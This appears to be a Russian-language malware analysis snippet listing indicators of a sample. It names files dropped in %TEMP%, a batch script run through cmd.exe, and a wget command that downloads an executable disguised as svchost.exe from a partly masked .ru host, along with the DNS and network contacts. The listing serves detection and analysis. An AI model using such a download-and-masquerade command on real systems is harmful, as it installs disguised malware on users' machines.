Техническая информация
- %TEMP%\svchost.exe (загружен из сети Интернет)
- %TEMP%\1.tmp\wget.exe http://rg##st.ru/download/36087449/5c64471cd41d002e387dca2e472aa57652e8ddb6/svchost.exe -O %TEMP%\svchost.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\main.bat" "
- %TEMP%\svchost.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\main.bat
- %TEMP%\1.tmp\main.bat
- %TEMP%\1.tmp\wget.exe
- %TEMP%\svchost.exe
- 'rg##st.ru':80
- rg##st.ru/download/36087449/5c64471cd41d002e387dca2e472aa57652e8ddb6/svchost.exe
- DNS ASK rg##st.ru
- '<IP-адрес в локальной сети>':1038